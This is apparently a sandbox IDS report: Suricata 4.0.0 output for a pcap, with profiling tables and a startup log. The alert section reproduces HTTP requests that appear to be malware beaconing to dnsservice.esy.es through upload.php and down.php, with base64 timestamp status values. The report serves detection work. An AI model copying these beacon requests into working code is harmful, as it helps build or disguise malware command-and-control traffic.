Filename: 1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 28.8805599213 seconds
Hash: cf556455534924bd14168c1c670054f9
Uploaded: 1565698245

Logfiles


unified2.alert.1565698272 (125419 bytes)
Readable HTTP payloads embedded in the unified2 alert records (unified2 is a binary format; the binary record framing between requests is omitted). The same POST/GET pair occurs 21 times, differing only in the value of the data parameter:

POST /./software1/upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache

id=CQUGKAWELS&subject=status&data=MDguMTEtMjAuMzcuMDA=

GET /./software1/down.php?file=CQUGKAWELS HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dnsservice.esy.es
Connection: Keep-Alive

data values seen across the 21 POSTs, in order (count in parentheses): MDguMTEtMjAuMzcuMDA= (1), MDguMTEtMjAuMzcuMDE= (3), MDguMTEtMjAuMzcuMDI= (2), MDguMTEtMjAuMzcuMDM= (3), MDguMTEtMjAuMzcuMDQ= (2), MDguMTEtMjAuMzcuMDU= (3), MDguMTEtMjAuMzcuMDY= (2), MDguMTEtMjAuMzcuMDc= (2), MDguMTEtMjAuMzcuMDg= (3). These are the base64 encodings of the strings 08.11-20.37.00 through 08.11-20.37.08.

(unified2.alert listing truncated in the original)


packet_stats.log (15789 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1            37         33897084     3113329168    1020388356         37.8b    0.64
 IPv4       2             2         24990410       34031538      29510974         59.0m    0.00
 IPv4       6          3221         10282848     3721642830    1794037455       5778.6b   98.70
 IPv4      17            51          3338240     3113195432     749237557         38.2b    0.65
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1            37           115230         366196        139055          5.1m    0.12
TMM_FLOWWORKER              IPv4       2             2           146804         166364        156584        313.2k    0.01
TMM_FLOWWORKER              IPv4       6          3221           115392       38382922       1248220          4.0b   96.36
TMM_FLOWWORKER              IPv4      17            51           269596       18051572        945349         48.2m    1.16
TMM_RECEIVEPCAPFILE         IPv4       1            37             4450           5930          4759        176.1k    0.00
TMM_RECEIVEPCAPFILE         IPv4       2             2             4492           4838          4665          9.3k    0.00
TMM_RECEIVEPCAPFILE         IPv4       6          2899             4430       20883396         12634         36.6m    0.88
TMM_RECEIVEPCAPFILE         IPv4      17            51             4448           5986          4833        246.5k    0.01
TMM_DECODEPCAPFILE          IPv4       1            37             4650          21494          5669        209.8k    0.01
TMM_DECODEPCAPFILE          IPv4       2             2             4954           5836          5395         10.8k    0.00
TMM_DECODEPCAPFILE          IPv4       6          2899             4552       15517804         20953         60.7m    1.46
TMM_DECODEPCAPFILE          IPv4      17            51             4616          28624          5698        290.6k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg            tot           %% 
--------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
flow                    IPv4       1            37             4826           8052          5636        208.6k  0.01  
flow                    IPv4       6          2899             4744         260646          7338         21.3m  0.56  
flow                    IPv4      17            51             4814          42120          8147        415.5k  0.01  
stream                  IPv4       6          3221             5264         593520         38757        124.8m  3.31  
app-layer               IPv4      17            51             4434          61628          9551        487.1k  0.01  
detect                  IPv4       1            37            96284         333114        117254          4.3m  0.12  
detect                  IPv4       2             2           136360         156826        146593        293.2k  0.01  
detect                  IPv4       6          3221            77024       34166118       1107684          3.6b  94.73 
detect                  IPv4      17            51           241260        7872934        554719         28.3m  0.75  
tcp-prune               IPv4       6          3221             4446         267620          5686         18.3m  0.49  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg            tot           %% 
--------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
http                    IPv4       6           644             5168         108324         10462          6.7m  98.32 
dns                     IPv4      17             7            10920          24710         16408        114.9k  1.68  
Proto detect            IPv4      17            11             4980          34464         14036        154.4k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
LOGGER_ALERT_FAST           IPv4       6           322            56806         529608         96873         31.2m  15.92 
LOGGER_UNIFIED2             IPv4       6           322            47564         303018         62706         20.2m  10.30 
LOGGER_JSON_ALERT           IPv4       6           322            73828       24539640        216033         69.6m  35.49 
LOGGER_JSON_DNS             IPv4      17             4           112820       17225924       4463820         17.9m  9.11  
LOGGER_JSON_HTTP            IPv4       6           322            43938         294132         62472         20.1m  10.26 
LOGGER_JSON_FILE            IPv4       6           483            47068         702838         76745         37.1m  18.91 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1            37             4946          34624          9395       347.6k  0.16  
payload                           IPv4       6          1288             4460         284404         35224        45.4m  20.36 
payload                           IPv4      17            51             6212         145170         40762         2.1m  0.93  
stream                            IPv4       6          1288             4434        7553796         39371        50.7m  22.75 
http_uri                          IPv4       6           322            17822         141500         31223        10.1m  4.51  
http_request_line                 IPv4       6           322             8216          40304         10622         3.4m  1.53  
http_client_body                  IPv4       6           322             4942         104188         22918         7.4m  3.31  
http_header (request)             IPv4       6           322            41988         218130         79251        25.5m  11.45 
http_header (request trailer)     IPv4       6           322             4478          31170          5102         1.6m  0.74  
http_header_names (request)       IPv4       6           322            15914          69344         27156         8.7m  3.92  
http_accept (request)             IPv4       6           322             5214          25414          6320         2.0m  0.91  
http_referer (request)            IPv4       6           322             4866          22264          5559         1.8m  0.80  
http_content_len (request)        IPv4       6           322             4980          45344          6813         2.2m  0.98  
http_content_type (request)       IPv4       6           322             4992          46740         11306         3.6m  1.63  
http_protocol (request)           IPv4       6           322             5900         112864          8572         2.8m  1.24  
http_start (request)              IPv4       6           322            12620         161304         19702         6.3m  2.85  
http_raw_header (request)         IPv4       6           322            16530         196120         22028         7.1m  3.18  
http_method                       IPv4       6           322             8000          50200         10339         3.3m  1.49  
http_cookie (request)             IPv4       6           322             4914          27518          5683         1.8m  0.82  
http_raw_uri                      IPv4       6           322             8802          56208         11999         3.9m  1.73  
http_user_agent                   IPv4       6           322            24970         167314         36359        11.7m  5.25  
http_host                         IPv4       6           322             7764         127198         10993         3.5m  1.59  
dns_query                         IPv4      17             2            16912          17644         17278        34.6k  0.02  
http_response_line                IPv4       6           322             4976          36590          6899         2.2m  1.00  
http_header (response)            IPv4       6           322             7776          71648         11167         3.6m  1.61  
http_header (response trailer)    IPv4       6           322             4456          49076          4961         1.6m  0.72  
http_content_type (response)      IPv4       6           322             4952          84610          6084         2.0m  0.88  
http_raw_header (response)        IPv4       6           322            11080         430722         13257         4.3m  1.92  
http_cookie (response)            IPv4       6           322             4678         426804          6702         2.2m  0.97  
http_stat_code                    IPv4       6           322             4626          21222          5143         1.7m  0.74  
Total                             IPv4                 10716                                         20799       222.9m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
PROF_DETECT_IPONLY          IPv4       1             2            42054          47288         44671         89.3k  0.00  
PROF_DETECT_IPONLY          IPv4       2             2            52700          73160         62930        125.9k  0.00  
PROF_DETECT_IPONLY          IPv4       6           645            15452         298358         53009         34.2m  0.64  
PROF_DETECT_IPONLY          IPv4      17            10            30190         186540         74786        747.9k  0.01  
PROF_DETECT_RULES           IPv4       1            37             4434           5946          4757        176.0k  0.00  
PROF_DETECT_RULES           IPv4       2             2             4448           4482          4465          8.9k  0.00  
PROF_DETECT_RULES           IPv4       6          3221             4444       33389148        878083          2.8b  53.03 
PROF_DETECT_RULES           IPv4      17            51            63234        7688950        382054         19.5m  0.37  
PROF_DETECT_STATEFUL_START    IPv4       6           966             9030       27458370       1596203          1.5b  28.91 
PROF_DETECT_STATEFUL_CONT    IPv4       1            37             4414          26650          5847        216.4k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       2             2             4454           4480          4467          8.9k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       6          3221             4398         356308         10235         33.0m  0.62  
PROF_DETECT_STATEFUL_CONT    IPv4      17            51             4414          51144          6767        345.1k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          1932             4458          58384          5077          9.8m  0.18  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             4             4560           5556          5182         20.7k  0.00  
PROF_DETECT_PREFILTER       IPv4       1            37            32196         223452         43039          1.6m  0.03  
PROF_DETECT_PREFILTER       IPv4       2             2            13840          13998         13919         27.8k  0.00  
PROF_DETECT_PREFILTER       IPv4       6          3221            13580       21632700        128400        413.6m  7.75  
PROF_DETECT_PREFILTER       IPv4      17            51            42798         193954         84332          4.3m  0.08  
PROF_DETECT_PF_PAYLOAD      IPv4       1            37            14002         181244         22726        840.9k  0.02  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1288            26838        7573370         90748        116.9m  2.19  
PROF_DETECT_PF_PAYLOAD      IPv4      17            51            15448         154090         50503          2.6m  0.05  
PROF_DETECT_PF_TX           IPv4       6          1932             4580       21465060        104090        201.1m  3.77  
PROF_DETECT_PF_TX           IPv4      17             2            27628          28386         28007         56.0k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6          1288             4576         124366          9472         12.2m  0.23  
PROF_DETECT_PF_SORT1        IPv4      17            51             4714          22080          6617        337.5k  0.01  
PROF_DETECT_PF_SORT2        IPv4       1            37             4412          28048          5215        193.0k  0.00  
PROF_DETECT_PF_SORT2        IPv4       2             2             4416           4708          4562          9.1k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6          3221             4414        4254196          7567         24.4m  0.46  
PROF_DETECT_PF_SORT2        IPv4      17            51             4494          28392          6297        321.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       1            37             4450          27842          6162        228.0k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       2             2             4664           4804          4734          9.5k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       6          3221             4456         260598          5614         18.1m  0.34  
PROF_DETECT_NONMPMLIST      IPv4      17            51             4436          22732          5545        282.8k  0.01  
PROF_DETECT_ALERT           IPv4       1            37             4422           5514          4561        168.8k  0.00  
PROF_DETECT_ALERT           IPv4       2             2             4482           4512          4497          9.0k  0.00  
PROF_DETECT_ALERT           IPv4       6          3221             4410        6877716          7872         25.4m  0.48  
PROF_DETECT_ALERT           IPv4      17            51             4432          27442          5605        285.9k  0.01  
PROF_DETECT_CLEANUP         IPv4       1            37             4428           6010          4649        172.0k  0.00  
PROF_DETECT_CLEANUP         IPv4       2             2             4452           4470          4461          8.9k  0.00  
PROF_DETECT_CLEANUP         IPv4       6          3221             4462         286878          5939         19.1m  0.36  
PROF_DETECT_CLEANUP         IPv4      17            51             4426          18000          5296        270.1k  0.01  
PROF_DETECT_GETSGH          IPv4       1            37             4450          29650          5553        205.5k  0.00  
PROF_DETECT_GETSGH          IPv4       2             2             4730           4974          4852          9.7k  0.00  
PROF_DETECT_GETSGH          IPv4       6          3221             4424         364584          6725         21.7m  0.41  
PROF_DETECT_GETSGH          IPv4      17            51             4422          66558          8246        420.6k  0.01  


suricata-4.0.0-etpro-all-perf.txt-2019-08-13-T-12-11-14-08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap.txt (33750 bytes)
  --------------------------------------------------------------------------
  Date: 8/13/2019 -- 12:11:13. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820851      1        5        45633992     1.79   322      0        23899412    141720.47   0.00        141720.47  
  2        2021418      1        9        45354228     1.78   322      0        22787700    140851.64   0.00        140851.64  
  3        2816928      1        3        42865474     1.68   322      0        19524338    133122.59   0.00        133122.59  
  4        2816713      1        2        17978774     0.70   161      0        11599448    111669.40   0.00        111669.40  
  5        2816526      1        13       27400460     1.07   322      0        10757338    85094.60    0.00        85094.60   
  6        2816924      1        4        26825276     1.05   322      0        10514772    83308.31    0.00        83308.31   
  7        2816910      1        2        40845768     1.60   322      0        9667256     126850.21   0.00        126850.21  
  8        2008116      1        4        7807494      0.31   44       0        7555176     177443.05   0.00        177443.05  
  9        2017259      1        12       23605350     0.93   161      0        7026550     146617.08   0.00        146617.08  
  10       2021718      1        4        17410678     0.68   161      0        7004694     108140.86   0.00        108140.86  
  11       2811826      1        7        16722094     0.66   161      0        7001362     103863.94   0.00        103863.94  
  12       2018452      1        15       26144870     1.02   322      0        5364402     81195.25    0.00        81195.25   
  13       2805260      1        4        17317694     0.68   322      0        4878512     53781.66    0.00        53781.66   
  14       2017261      1        3        23813694     0.93   322      0        3897478     73955.57    0.00        73955.57   
  15       2018983      1        7        22899098     0.90   322      0        3395078     71115.21    0.00        71115.21   
  16       2821641      1        2        23765042     0.93   322      0        3244766     73804.48    0.00        73804.48   
  17       2816940      1        2        33452964     1.31   322      0        2413994     103891.19   0.00        103891.19  
  18       2816931      1        3        19657594     0.77   322      0        2114308     61048.43    0.00        61048.43   
  19       2815156      1        2        9254428      0.36   161      0        1091490     57480.92    0.00        57480.92   
  20       2815181      1        3        10989518     0.43   161      0        848860      68257.88    0.00        68257.88   
  21       2813027      1        3        6840314      0.27   161      0        697154      42486.42    0.00        42486.42   
  22       2816614      1        3        19968612     0.78   161      161      638376      124028.65   124028.65   0.00       
  23       2018358      1        7        44799510     1.76   322      0        563200      139128.91   0.00        139128.91  
  24       2016537      1        2        9309596      0.36   322      0        558070      28911.79    0.00        28911.79   
  25       2016858      1        10       24552404     0.96   322      0        542316      76249.70    0.00        76249.70   
  26       2812433      1        2        23500258     0.92   322      0        536860      72982.17    0.00        72982.17   
  27       2017948      1        2        19083932     0.75   322      0        535216      59266.87    0.00        59266.87   
  28       2819785      1        2        16215680     0.64   161      0        528570      100718.51   0.00        100718.51  
  29       2811474      1        2        6817814      0.27   161      0        508954      42346.67    0.00        42346.67   
  30       2807970      1        8        22596842     0.89   322      0        506536      70176.53    0.00        70176.53   
  31       2019344      1        5        23499676     0.92   322      0        502648      72980.36    0.00        72980.36   
  32       2821615      1        2        17720094     0.69   322      0        502482      55031.35    0.00        55031.35   
  33       2810991      1        4        15146656     0.59   161      0        501736      94078.61    0.00        94078.61   
  34       2014967      1        3        16813832     0.66   322      0        501450      52216.87    0.00        52216.87   
  35       2809363      1        3        22409906     0.88   322      0        495882      69595.98    0.00        69595.98   
  36       2815325      1        3        22496002     0.88   322      0        495026      69863.36    0.00        69863.36   
  37       2821643      1        2        21340472     0.84   322      0        493980      66274.76    0.00        66274.76   
  38       2022504      1        6        6973360      0.27   161      0        491996      43312.80    0.00        43312.80   
  39       2816055      1        2        12456770     0.49   161      0        490528      77371.24    0.00        77371.24   
  40       2019094      1        5        21880672     0.86   322      0        488812      67952.40    0.00        67952.40   
  41       2828122      1        2        21299636     0.83   322      0        486624      66147.94    0.00        66147.94   
  42       2012612      1        16       32752986     1.28   322      161      483118      101717.35   158642.32   44792.37   
  43       2816525      1        10       20747534     0.81   322      0        479094      64433.34    0.00        64433.34   
  44       2014090      1        7        13285426     0.52   322      0        478408      41259.09    0.00        41259.09   
  45       2021413      1        2        19165624     0.75   322      0        477962      59520.57    0.00        59520.57   
  46       2018496      1        9        16615972     0.65   322      0        477836      51602.40    0.00        51602.40   
  47       2816922      1        5        18423450     0.72   322      0        473212      57215.68    0.00        57215.68   
  48       2008377      1        5        8822882      0.35   161      0        471386      54800.51    0.00        54800.51   
  49       2819823      1        5        8687718      0.34   161      0        469844      53960.98    0.00        53960.98   
  50       2816930      1        4        20214518     0.79   322      0        468644      62778.01    0.00        62778.01   
  51       2018055      1        3        16315236     0.64   322      0        467964      50668.43    0.00        50668.43   
  52       2821471      1        2        21148850     0.83   322      0        467438      65679.66    0.00        65679.66   
  53       2024771      1        1        15015008     0.59   322      0        459816      46630.46    0.00        46630.46   
  54       2816929      1        4        23692428     0.93   322      0        432936      73578.97    0.00        73578.97   
  55       2828008      1        2        23405726     0.92   322      0        428400      72688.59    0.00        72688.59   
  56       2021399      1        3        8902620      0.35   161      0        427702      55295.78    0.00        55295.78   
  57       2828877      1        1        2090334      0.08   322      0        427358      6491.72     0.00        6491.72    
  58       2821450      1        3        14691020     0.58   161      0        426784      91248.57    0.00        91248.57   
  59       2023916      1        2        10956940     0.43   161      0        401378      68055.53    0.00        68055.53   
  60       2819673      1        4        20675090     0.81   322      0        371794      64208.35    0.00        64208.35   
  61       2806921      1        3        6593256      0.26   161      0        366498      40951.90    0.00        40951.90   
  62       2017456      1        3        6367078      0.25   161      0        361016      39547.07    0.00        39547.07   
  63       2816726      1        2        6513930      0.26   161      0        349568      40459.19    0.00        40459.19   
  64       2015877      1        6        17841206     0.70   322      0        341922      55407.47    0.00        55407.47   
  65       2821561      1        2        11127982     0.44   161      0        341054      69117.90    0.00        69117.90   
  66       2815440      1        3        24219542     0.95   322      0        333032      75215.97    0.00        75215.97   
  67       2821644      1        4        21095296     0.83   322      0        324684      65513.34    0.00        65513.34   
  68       2828317      1        1        6881328      0.27   161      0        321804      42741.17    0.00        42741.17   
  69       2020181      1        8        27955032     1.10   322      0        318752      86816.87    0.00        86816.87   
  70       2823858      1        3        20614444     0.81   322      0        313960      64020.01    0.00        64020.01   
  71       2018958      1        18       26019712     1.02   322      0        287816      80806.56    0.00        80806.56   
  72       2827279      1        5        22955018     0.90   322      0        281480      71288.88    0.00        71288.88   
  73       2816327      1        4        20847310     0.82   322      0        259520      64743.20    0.00        64743.20   
  74       2816909      1        2        31662574     1.24   322      0        257500      98330.98    0.00        98330.98   
  75       2018981      1        4        16557692     0.65   322      0        256306      51421.40    0.00        51421.40   
  76       2016809      1        5        12854226     0.50   322      0        248604      39919.96    0.00        39919.96   
  77       2014380      1        4        11406550     0.45   322      0        246636      35424.07    0.00        35424.07   
  78       2003657      1        18       13075340     0.51   322      0        243200      40606.65    0.00        40606.65   
  79       2025064      1        5        22295276     0.87   322      0        236094      69239.99    0.00        69239.99   
  80       2815817      1        5        17811530     0.70   322      0        235832      55315.31    0.00        55315.31   
  81       2816895      1        2        13637000     0.53   161      0        227208      84701.86    0.00        84701.86   
  82       2804626      1        9        13099814     0.51   322      0        219066      40682.65    0.00        40682.65   
  83       2801224      1        6        6395560      0.25   161      0        216878      39723.98    0.00        39723.98   
  84       2017076      1        9        6477836      0.25   161      0        215960      40235.01    0.00        40235.01   
  85       2825196      1        1        6475446      0.25   161      0        215352      40220.16    0.00        40220.16   
  86       2806959      1        2        6538392      0.26   161      0        214974      40611.13    0.00        40611.13   
  87       2822633      1        3        6510014      0.26   161      0        212518      40434.87    0.00        40434.87   
  88       2811905      1        3        10239350     0.40   161      0        207644      63598.45    0.00        63598.45   
  89       2809511      1        4        16344194     0.64   322      0        204666      50758.37    0.00        50758.37   
  90       2826256      1        2        13228488     0.52   322      0        203234      41082.26    0.00        41082.26   
  91       2821642      1        2        19305048     0.76   322      0        202710      59953.57    0.00        59953.57   
  92       2016706      1        20       12824554     0.50   322      0        197192      39827.81    0.00        39827.81   
  93       2015808      1        6        12931838     0.51   322      0        191814      40160.99    0.00        40160.99   
  94       2823488      1        2        8467302      0.33   161      0        191540      52591.94    0.00        52591.94   
  95       2022901      1        2        20194780     0.79   322      0        190524      62716.71    0.00        62716.71   
  96       2815568      1        2        18524418     0.73   322      0        189614      57529.25    0.00        57529.25   
  97       2807793      1        4        16210060     0.64   322      0        187410      50341.80    0.00        50341.80   
  98       2829644      1        1        9036052      0.35   161      0        187028      56124.55    0.00        56124.55   
  99       2821569      1        7        16262292     0.64   322      0        185306      50504.01    0.00        50504.01   
  100      2020708      1        2        11849996     0.46   161      0        185138      73602.46    0.00        73602.46   
  101      2024573      1        2        8136224      0.32   161      0        181958      50535.55    0.00        50535.55   
  102      2820696      1        2        8175138      0.32   161      0        181394      50777.25    0.00        50777.25   
  103      2021631      1        2        10091332     0.40   161      0        180338      62679.08    0.00        62679.08   
  104      2017613      1        9        17440656     0.68   322      0        178608      54163.53    0.00        54163.53   
  105      2806132      1        3        8686626      0.34   161      0        176690      53954.20    0.00        53954.20   
  106      2020964      1        2        8438040      0.33   161      0        174512      52410.19    0.00        52410.19   
  107      2021995      1        3        11958768     0.47   161      0        169572      74278.06    0.00        74278.06   
  108      2810982      1        3        6779016      0.27   161      0        163500      42105.69    0.00        42105.69   
  109      2809547      1        5        12405270     0.49   322      0        163128      38525.68    0.00        38525.68   
  110      2809682      1        5        12427046     0.49   322      0        162438      38593.31    0.00        38593.31   
  111      2025162      1        2        8535604      0.33   161      0        161868      53016.17    0.00        53016.17   
  112      2018242      1        5        15994114     0.63   322      0        161864      49671.16    0.00        49671.16   
  113      2816165      1        5        19720188     0.77   322      0        161574      61242.82    0.00        61242.82   
  114      2827580      1        7        6744480      0.26   161      0        160954      41891.18    0.00        41891.18   
  115      2017552      1        6        21031384     0.82   644      0        160074      32657.43    0.00        32657.43   
  116      2823166      1        3        8780038      0.34   161      0        159020      54534.40    0.00        54534.40   
  117      2830035      1        2        6646896      0.26   161      0        158100      41285.07    0.00        41285.07   
  118      2829335      1        2        6289338      0.25   161      0        157838      39064.21    0.00        39064.21   
  119      2012627      1        3        6507692      0.26   161      0        156868      40420.45    0.00        40420.45   
  120      2815180      1        3        10260884     0.40   161      0        156404      63732.20    0.00        63732.20   
  121      2820889      1        2        6398418      0.25   161      0        154144      39741.73    0.00        39741.73   
  122      2017045      1        3        752310       0.03   15       0        153936      50154.00    0.00        50154.00   
  123      2011894      1        19       20091042     0.79   322      0        150088      62394.54    0.00        62394.54   
  124      2819993      1        2        8166992      0.32   161      0        149204      50726.66    0.00        50726.66   
  125      2804765      1        10       6

This file has been truncated.


suricata-report-2019-08-13-T-12-11-14-08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap.txt - (17876 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/cf556455534924bd14168c1c670054f956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap -vvv -k none
elapsedtime:27.824699
stderr:
stdout:
13/8/2019 -- 12:10:46 - <Info> - Configuration node 'rule-files' redefined.
13/8/2019 -- 12:10:46 - <Notice> - This is Suricata version 4.0.0 RELEASE
13/8/2019 -- 12:10:46 - <Info> - CPUs/cores online: 1
13/8/2019 -- 12:10:46 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 34270 and 'request-body-inspect-window' set to 16239 after randomization.
13/8/2019 -- 12:10:46 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32945 and 'response-body-inspect-window' set to 16082 after randomization.
13/8/2019 -- 12:10:46 - <Config> - DNS request flood protection level: 500
13/8/2019 -- 12:10:46 - <Config> - DNS per flow memcap (state-memcap): 524288
13/8/2019 -- 12:10:46 - <Config> - DNS global memcap: 16777216
13/8/2019 -- 12:10:46 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
13/8/2019 -- 12:10:46 - <Config> - preallocated 1000 hosts of size 136
13/8/2019 -- 12:10:46 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
13/8/2019 -- 12:10:46 - <Config> - using magic-file /usr/share/file/magic
13/8/2019 -- 12:10:46 - <Config> - Core dump size is unlimited.
13/8/2019 -- 12:10:46 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
13/8/2019 -- 12:10:46 - <Config> - preallocated 1000 defrag trackers of size 168
13/8/2019 -- 12:10:46 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
13/8/2019 -- 12:10:46 - <Config> - stream "prealloc-sessions": 2048 (per thread)
13/8/2019 -- 12:10:46 - <Config> - stream "memcap": 33554432
13/8/2019 -- 12:10:46 - <Config> - stream "midstream" session pickups: disabled
13/8/2019 -- 12:10:46 - <Config> - stream "async-oneside": disabled
13/8/2019 -- 12:10:46 - <Config> - stream "checksum-validation": disabled
13/8/2019 -- 12:10:46 - <Config> - stream."inline": disabled
13/8/2019 -- 12:10:46 - <Config> - stream "bypass": disabled
13/8/2019 -- 12:10:46 - <Config> - stream "max-synack-queued": 5
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "memcap": 134217728
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "depth": 0
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "toserver-chunk-size": 2446
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "toclient-chunk-size": 2532
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly.raw: enabled
13/8/2019 -- 12:10:46 - <Config> - stream.reassembly "segment-prealloc": 2048
13/8/2019 -- 12:10:46 - <Config> - Delayed detect disabled
13/8/2019 -- 12:10:46 - <Config> - pattern matchers: MPM: ac, SPM: bm
13/8/2019 -- 12:10:46 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
13/8/2019 -- 12:10:46 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
13/8/2019 -- 12:10:46 - <Config> - prefilter engines: MPM
13/8/2019 -- 12:10:46 - <Config> - IP reputation disabled
13/8/2019 -- 12:10:46 - <Perf> - Registered 148 keyword profiling counters.
13/8/2019 -- 12:10:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
13/8/2019 -- 12:10:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
13/8/2019 -- 12:10:46 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
13/8/2019 -- 12:10:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
13/8/2019 -- 12:10:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
13/8/2019 -- 12:10:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
13/8/2019 -- 12:10:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
13/8/2019 -- 12:10:52 - <Config> - No rules loaded from ET-icmp.rules.
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
13/8/2019 -- 12:10:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
13/8/2019 -- 12:10:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
13/8/2019 -- 12:10:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
13/8/2019 -- 12:10:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
13/8/2019 -- 12:10:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
13/8/2019 -- 12:10:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
